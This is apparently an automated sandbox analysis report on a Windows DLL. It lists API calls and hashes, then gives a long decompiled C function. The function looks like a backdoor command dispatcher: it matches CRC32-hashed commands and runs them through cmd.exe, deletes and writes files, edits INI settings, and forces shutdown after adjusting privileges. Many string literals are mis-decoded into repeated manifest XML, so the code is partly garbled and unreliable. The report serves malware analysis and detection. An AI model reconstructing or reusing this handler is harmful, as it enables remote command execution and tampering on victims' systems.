    • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 6ECA6FC1
      • Part of subcall function 6ECA1DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1E3E
      • Part of subcall function 6ECA1DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6ECA1E48
    • SetTimer.USER32 ref: 6ECA6FD7
    • GetMessageA.USER32 ref: 6ECA6FFA
    • KillTimer.USER32(00000000,00000000), ref: 6ECA707F
    • RtlZeroMemory.NTDLL(00000000,00001000), ref: 6ECA70B6
    • wsprintfW.USER32 ref: 6ECA70D9
    • GetPrivateProfileStringW.KERNEL32(PWD,?,00000000,?,00000103,00CC4128), ref: 6ECA7103
    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6ECA7131
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 6ECA7138
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6ECA713F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Memory$Heap$Zero$FreeMoveProcess$Timer$AllocCharComputeCrc32InfoKillLocaleLowerMessageNumbersPrivateProfileStringVersionVirtuallstrlenwsprintf
    • String ID: %lu$%s\%s$($PWD$gd$gd
    • API String ID: 2388189746-3190195910
    • Opcode ID: 70cbdd18ef85b8314e504df6862a5c51a1f6d5d782fbcf571a2afbd34bafa655
    • Instruction ID: 9df3c749639cf5fcd04f4f0adb3848239d14b8871e186853e825ec8e81aaef2b
    • Opcode Fuzzy Hash: 70cbdd18ef85b8314e504df6862a5c51a1f6d5d782fbcf571a2afbd34bafa655
    • Instruction Fuzzy Hash: 215271B1508742AFD720DFA8C984EABBBF9FB89704F00891DF68587245E774D944CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E6ECA5B40() {
    				void* __ebx;
    				void* __edi;
    				void* __ebp;
    				void* _t91;
    				void* _t95;
    				char _t106;
    				char _t109;
    				int _t115;
    				char* _t133;
    				int _t150;
    				WCHAR* _t152;
    				int _t153;
    				int _t154;
    				int _t155;
    				char* _t156;
    				long _t159;
    				char* _t163;
    				int _t168;
    				int _t169;
    				long _t174;
    				long _t177;
    				int _t180;
    				int _t185;
    				int _t193;
    				struct HWND__* _t197;
    				intOrPtr* _t202;
    				int _t203;
    				int _t204;
    				char* _t206;
    				void* _t209;
    				void* _t213;
    				CHAR* _t227;
    				struct HWND__* _t232;
    				intOrPtr _t233;
    				int _t234;
    				char _t238;
    				CHAR* _t256;
    				CHAR* _t257;
    				struct HWND__* _t258;
    				intOrPtr _t259;
    				long _t262;
    				long _t264;
    				int _t265;
    				signed int _t271;
    				int _t276;
    				int _t279;
    				void* _t280;
    				int _t281;
    				void* _t282;
    				void* _t283;
    				void* _t285;
    				void* _t287;
    				void* _t291;
    				void* _t298;
    				void* _t299;
    
    				_t209 =  *(_t282 + 0x130);
    				 *(_t282 + 0x1c) = 0;
    				_t280 = E6ECAA3D0( *(_t209 + 0xc), _t282 + 0x14);
    				_t283 = _t282 + 8;
    				 *(_t283 + 0x10) = _t280;
    				if(_t280 == 0) {
    					L133:
    					_t91 =  *_t209;
    					if(_t91 != 0) {
    						WaitForSingleObject(_t91, 0xffffffff);
    						CloseHandle( *_t209);
    					}
    					HeapFree(GetProcessHeap(), 0,  *(_t209 + 0xc));
    					_t95 =  *(_t209 + 0x14);
    					if(_t95 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t95);
    					}
    					HeapFree(GetProcessHeap(), 0, _t209);
    					return 0;
    				}
    				if( *((intOrPtr*)(_t283 + 0x14)) <= 0) {
    					L132:
    					LocalFree(_t280);
    					goto L133;
    				}
    				CharLowerA( *_t280);
    				_t106 =  *( *_t280);
    				if(_t106 < 0x61 || _t106 > 0x7a) {
    					if(_t106 != 0x21) {
    						E6ECA5AF0(_t209, 4, 0, 0);
    						goto L132;
    					}
    					goto L5;
    				} else {
    					L5:
    					_t109 = HeapAlloc(GetProcessHeap(), 8, 0x400);
    					 *(_t283 + 0x18) = _t109;
    					if(_t109 == 0) {
    						goto L132;
    					}
    					_t262 = lstrlenA( *_t280);
    					_t271 = RtlComputeCrc32(0,  *_t280, _t262) ^ 0x00435a88;
    					_t298 = _t271 - 0x539b9257;
    					if(_t298 > 0) {
    						__eflags = _t271 - 0xcd8eabe7;
    						if(__eflags > 0) {
    							__eflags = _t271 - 0xe7ba788f;
    							if(__eflags > 0) {
    								__eflags = _t271 - 0xf06cffa0;
    								if(_t271 == 0xf06cffa0) {
    									L13:
    									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
    										wsprintfA( *(_t283 + 0x18), "/c %s",  *(_t209 + 0xc) + _t262 + 1);
    										_t285 = _t283 + 0xc;
    										__eflags = _t271 - 0x876bcf36;
    										if(_t271 == 0x876bcf36) {
    											L124:
    											_t213 = 0x384;
    											L125:
    											__eflags = _t271 - 0x2f1f4648;
    											if(_t271 == 0x2f1f4648) {
    												L128:
    												_t115 = 0;
    												__eflags = 0;
    												L129:
    												_push(0);
    												_push(_t213);
    												_push(_t115);
    												E6ECA5AF0(_t209, E6ECA4230(0, "cmd.exe",  *((intOrPtr*)(_t285 + 0x24))), 0, 0);
    												_t283 = _t285 + 0x28;
    												goto L130;
    											}
    											__eflags = _t271 - 0x876bcf36;
    											if(_t271 == 0x876bcf36) {
    												goto L128;
    											}
    											_t115 = 1;
    											goto L129;
    										}
    										__eflags = _t271 - 0x4779d712;
    										if(_t271 == 0x4779d712) {
    											goto L124;
    										}
    										__eflags = _t271 - 0x2965d6c5;
    										if(_t271 == 0x2965d6c5) {
    											goto L124;
    										}
    										_t213 = 0;
    										goto L125;
    									} else {
    										E6ECA5AF0(_t209, 2, 0, 0);
    										_t283 = _t283 + 0x10;
    										L130:
    										HeapFree(GetProcessHeap(), 0,  *(_t283 + 0x18));
    										goto L132;
    									}
    								}
    								__eflags = _t271 - 0xf4d35c00;
    								if(_t271 == 0xf4d35c00) {
    									_push(0);
    									_push(0);
    									_push(0x65);
    									L84:
    									_push(E6ECA5190());
    									_push(_t209);
    									E6ECA5AF0();
    									_t283 = _t283 + 0x14;
    									goto L130;
    								}
    								__eflags = _t271 - 0xf7013bb9;
    								if(_t271 == 0xf7013bb9) {
    									__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
    									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
    										_t238 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    										wsprintfA( *(_t283 + 0x18), "\"%s%s\" /c %s", _t238, "cmd.exe",  *(_t209 + 0xc) + _t262 + 1);
    										_push(_t283 + 0x24);
    										_push(0x384);
    										 *(_t283 + 0x30) = 0;
    										__eflags = E6ECA2ED0( *(_t283 + 0x18));
    										E6ECA5AF0(_t209, 0 | E6ECA2ED0( *(_t283 + 0x18)) != 0x00000000, _t127,  *(_t283 + 0x30));
    										_t283 = _t283 + 0x30;
    										goto L130;
    									}
    									L117:
    									E6ECA5AF0(_t209, 2, 0, 0);
    									_t283 = _t283 + 0x10;
    									goto L130;
    								}
    								L115:
    								E6ECA5AF0(_t209, 4, 0, 0);
    								_t283 = _t283 + 0x10;
    								goto L130;
    							}
    							if(__eflags == 0) {
    								L107:
    								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
    								if( *((intOrPtr*)(_t283 + 0x14)) <= 1) {
    									L111:
    									E6ECA5060(5, 0, 0);
    									_t283 = _t283 + 0xc;
    									goto L130;
    								}
    								_t133 =  *((intOrPtr*)(_t280 + 4));
    								__eflags =  *_t133 - 0x67;
    								if( *_t133 != 0x67) {
    									goto L111;
    								}
    								__eflags =  *((char*)(_t133 + 1));
    								if( *((char*)(_t133 + 1)) != 0) {
    									goto L111;
    								}
    								E6ECA5060(5, 1, 0);
    								_t283 = _t283 + 0xc;
    								goto L130;
    							}
    							__eflags = _t271 - 0xd4c57ba8;
    							if(_t271 == 0xd4c57ba8) {
    								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
    								_push(".pdll");
    								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
    									_push( *((intOrPtr*)(_t280 + 4)));
    									_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    									wsprintfA(_t283 + 0x3c, "%s%s%s");
    									_t287 = _t283 + 0x14;
    									E6ECA5AF0(_t209, DeleteFileA(_t287 + 0x30), 0, 0);
    									_t283 = _t287 + 0x10;
    								} else {
    									_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    									E6ECA5AF0(_t209, E6ECA2DF0(), 0, 0);
    									_t283 = _t283 + 0x18;
    								}
    								goto L130;
    							}
    							__eflags = _t271 - 0xdf32d24a;
    							if(_t271 == 0xdf32d24a) {
    								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
    								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
    									wsprintfA(_t283 + 0x3c, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD",  *((intOrPtr*)(_t280 + 4)), ".pdll");
    									E6ECA5AF0(_t209, E6ECA2750(_t283 + 0x44), 0, 0);
    									_t283 = _t283 + 0x28;
    								} else {
    									_push(0);
    									E6ECA28B0(".pdll");
    									E6ECA5AF0(_t209, 1, 0, 0);
    									_t283 = _t283 + 0x18;
    								}
    								goto L130;
    							}
    							__eflags = _t271 - 0xe6f1017f;
    							if(_t271 != 0xe6f1017f) {
    								goto L115;
    							}
    							L90:
    							_t150 = OpenProcessToken(0xffffffff, 0x28, _t283 + 0x10);
    							__eflags = _t150;
    							if(_t150 == 0) {
    								L98:
    								E6ECA5AF0(_t209, 0, 0, 0);
    								_t283 = _t283 + 0x10;
    								goto L130;
    							}
    							_t152 = M6ECB0568; // 0x0
    							_t153 = LookupPrivilegeValueW(0, _t152, _t283 + 0x24);
    							__eflags = _t153;
    							if(_t153 == 0) {
    								goto L98;
    							}
    							 *(_t283 + 0x38) = 1;
    							 *((intOrPtr*)(_t283 + 0x44)) = 2;
    							_t154 = AdjustTokenPrivileges( *(_t283 + 0x10), 0, _t283 + 0x2c, 0, 0, 0);
    							__eflags = _t154;
    							if(_t154 == 0) {
    								goto L98;
    							}
    							asm("sbb esi, esi");
    							_t276 = ( ~(_t271 - 0xc110de04) & 0x00000006) + 2;
    							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
    							if( *((intOrPtr*)(_t283 + 0x14)) > 1) {
    								_t156 =  *((intOrPtr*)(_t280 + 4));
    								__eflags =  *_t156 - 0x66;
    								if( *_t156 == 0x66) {
    									__eflags =  *((char*)(_t156 + 1));
    									if( *((char*)(_t156 + 1)) == 0) {
    										_t276 = _t276 | 0x00000014;
    										__eflags = _t276;
    									}
    								}
    							}
    							_t155 = ExitWindowsEx(_t276, 0);
    							__eflags = _t155;
    							if(_t155 != 0) {
    								goto L130;
    							} else {
    								goto L98;
    							}
    						}
    						if(__eflags == 0) {
    							_push(0);
    							_push(0);
    							_push(0x66);
    							goto L84;
    						}
    						__eflags = _t271 - 0xb3beafae;
    						if(__eflags > 0) {
    							__eflags = _t271 - 0xb9154c3e;
    							if(_t271 == 0xb9154c3e) {
    								E6ECA5060(5, 0, 1);
    								_t283 = _t283 + 0xc;
    								goto L130;
    							}
    							__eflags = _t271 - 0xc110de04;
    							if(_t271 == 0xc110de04) {
    								goto L90;
    							}
    							__eflags = _t271 - 0xc52dedf4;
    							if(_t271 != 0xc52dedf4) {
    								goto L115;
    							}
    							_push(0);
    							_push(0);
    							_push(0x75);
    							goto L84;
    						}
    						if(__eflags == 0) {
    							L57:
    							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 3;
    							if( *((intOrPtr*)(_t283 + 0x14)) >= 3) {
    								_t281 = 0;
    								 *(_t283 + 0x30) = 0;
    								__eflags = _t271 - 0x539b9257;
    								if(_t271 != 0x539b9257) {
    									_t264 =  *(_t283 + 0x10);
    									_t159 = ExpandEnvironmentStringsA( *(_t264 + 8), _t283 + 0x34, 0x104);
    									__eflags = _t159;
    									if(_t159 == 0) {
    										L63:
    										wsprintfA(_t283 + 0x38, "%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD",  *(_t264 + 8));
    										_t283 = _t283 + 0x10;
    										L64:
    										_t163 = StrRChrA(_t283 + 0x38, 0, 0x5c);
    										_t265 = _t163;
    										__eflags = _t265;
    										if(_t265 != 0) {
    											 *_t265 = 0;
    										}
    										__imp__SHCreateDirectoryExA(0, _t283 + 0x34, 0);
    										__eflags = _t265;
    										if(_t265 != 0) {
    											 *_t265 = 0x5c;
    										}
    										__eflags = _t163;
    										if(_t163 == 0) {
    											L71:
    											_push(_t283 + 0x30);
    											_push( *((intOrPtr*)( *(_t283 + 0x10) + 4)));
    											_t281 = E6ECA5A00();
    											_t283 = _t283 + 8;
    											__eflags = _t281;
    											if(_t281 == 0) {
    												goto L77;
    											}
    											__eflags = _t271 - 0xb3beafae;
    											if(_t271 != 0xb3beafae) {
    												__eflags = _t271 - 0x539b9257;
    												if(_t271 != 0x539b9257) {
    													goto L77;
    												}
    												_t168 = E6ECA2750(_t283 + 0x30);
    												_t283 = _t283 + 4;
    												L76:
    												_t281 = _t168;
    												goto L77;
    											}
    											_push(0);
    											_push(0);
    											_push(1);
    											_t168 = E6ECA4230("open", _t283 + 0x40, 0);
    											_t283 = _t283 + 0x18;
    											goto L76;
    										} else {
    											__eflags = _t163 - 0x50;
    											if(_t163 == 0x50) {
    												goto L71;
    											}
    											__eflags = _t163 - 0xb7;
    											if(_t163 != 0xb7) {
    												L77:
    												E6ECA5AF0(_t209, _t281, 0, 0);
    												_t280 =  *(_t283 + 0x20);
    												_t283 = _t283 + 0x10;
    												goto L130;
    											}
    											goto L71;
    										}
    									}
    									_t169 = PathIsRelativeA(_t283 + 0x30);
    									__eflags = _t169;
    									if(_t169 == 0) {
    										goto L64;
    									}
    									goto L63;
    								}
    								wsprintfA(_t283 + 0x3c, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD",  *((intOrPtr*)( *(_t283 + 0x10) + 8)), ".pdll");
    								_t283 = _t283 + 0x14;
    								goto L64;
    							}
    							E6ECA5AF0(_t209, 2, 0, 0);
    							_t283 = _t283 + 0x10;
    							goto L130;
    						}
    						__eflags = _t271 - 0x94a62224;
    						if(__eflags > 0) {
    							__eflags = _t271 - 0x98666ff0;
    							if(_t271 != 0x98666ff0) {
    								goto L115;
    							}
    							 *((intOrPtr*)(_t283 + 0x14)) = GetTickCount();
    							_t174 = RtlRandom(_t283 + 0x10);
    							_push(".cab");
    							_t227 = _t283 + 0x34;
    							__eflags =  *(_t283 + 0x18) - 1;
    							if( *(_t283 + 0x18) <= 1) {
    								_push( *_t280);
    								_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    								wsprintfA(_t227, "%s%s%s");
    								_t291 = _t283 + 0x14;
    							} else {
    								_push(_t174);
    								_push(0x75);
    								_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    								wsprintfA(_t227, "%s%c%lu%s");
    								_t291 = _t283 + 0x18;
    							}
    							__eflags =  *((intOrPtr*)(_t291 + 0x14)) - 1;
    							if( *((intOrPtr*)(_t291 + 0x14)) <= 1) {
    								L53:
    								_t177 = GetFileAttributesA(_t291 + 0x30);
    								__eflags = _t177 - 0xffffffff;
    								if(_t177 == 0xffffffff) {
    									L106:
    									E6ECA5AF0(_t209, 0, 0, 0);
    									_t283 = _t291 + 0x10;
    									goto L130;
    								}
    								goto L54;
    							} else {
    								_push(_t291 + 0x30);
    								_push( *((intOrPtr*)(_t280 + 4)));
    								_t185 = E6ECA5A00();
    								_t291 = _t291 + 8;
    								__eflags = _t185;
    								if(_t185 != 0) {
    									L54:
    									_t180 = E6ECA2DC0(_t291 + 0x38, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", 1);
    									_t283 = _t291 + 0xc;
    									__eflags = _t180;
    									if(_t180 != 0) {
    										E6ECA5AF0(_t209, 1, 0, 0);
    										E6ECA5060(5, 1, 0);
    										_t283 = _t283 + 0x1c;
    									}
    									DeleteFileA(_t283 + 0x30);
    									goto L130;
    								}
    								goto L53;
    							}
    						}
    						if(__eflags == 0) {
    							goto L57;
    						}
    						__eflags = _t271 - 0x5d22927c;
    						if(_t271 == 0x5d22927c) {
    							 *(_t283 + 0x1c) = GetTickCount();
    							wsprintfA(_t283 + 0x24, "%lu", RtlRandom(_t283 + 0x1c));
    							_t256 = M6ECB04CC; // 0xcb2da8
    							_t283 = _t283 + 0xc;
    							_t257 = M6ECB04F0; // 0x0
    							 *(_t283 + 0x20) = 0x6467;
    							 *((char*)(_t283 + 0x22)) = 0;
    							_t193 = WritePrivateProfileStringA(_t257, _t283 + 0x18, _t283 + 0x24, _t256);
    							__eflags = _t193;
    							if(_t193 != 0) {
    								goto L107;
    							}
    							goto L106;
    						}
    						__eflags = _t271 - 0x876bcf36;
    						if(_t271 == 0x876bcf36) {
    							goto L13;
    						}
    						E6ECA5AF0(_t209, 4, 0, 0);
    						_t283 = _t283 + 0x10;
    						goto L130;
    					}
    					if(_t298 == 0) {
    						goto L57;
    					}
    					_t299 = _t271 - 0x2a4ba2d1;
    					if(_t299 > 0) {
    						__eflags = _t271 - 0x2f1f4648;
    						if(_t271 == 0x2f1f4648) {
    							goto L13;
    						}
    						__eflags = _t271 - 0x4231ab60;
    						if(_t271 == 0x4231ab60) {
    							L37:
    							_t258 =  *0x6ecb0398; // 0x0
    							PostMessageA(GetDlgItem(_t258, 0x4e83), 0x111, 0x9cb6, 0);
    							_t197 =  *0x6ecb039c; // 0x0
    							PostMessageA(_t197, 0x201, 1, 0x490017);
    							Sleep(0x64);
    							_t232 =  *0x6ecb039c; // 0x0
    							PostMessageA(_t232, 0x202, 0, 0x490017);
    							Sleep(0x7d0);
    							E6ECA5AF0(_t209, 1, 0, 0);
    							_t283 = _t283 + 0x10;
    							goto L130;
    						}
    						__eflags = _t271 - 0x4779d712;
    						if(_t271 == 0x4779d712) {
    							goto L13;
    						}
    						E6ECA5AF0(_t209, 4, 0, 0);
    						_t283 = _t283 + 0x10;
    						goto L130;
    					}
    					if(_t299 == 0) {
    						_t259 =  *((intOrPtr*)(_t283 + 0x14));
    						__eflags = _t259 - 2;
    						if(_t259 >= 2) {
    							_t202 =  *((intOrPtr*)(_t280 + 4));
    							_t233 =  *_t202;
    							__eflags = _t233 - 0x69;
    							if(_t233 != 0x69) {
    								L21:
    								__eflags = _t233 - 0x72;
    								if(_t233 != 0x72) {
    									goto L117;
    								}
    								__eflags =  *((char*)(_t202 + 1));
    								if( *((char*)(_t202 + 1)) != 0) {
    									goto L117;
    								}
    								_t234 = 0;
    								__eflags = 0;
    								L24:
    								__eflags = _t259 - 2;
    								if(_t259 <= 2) {
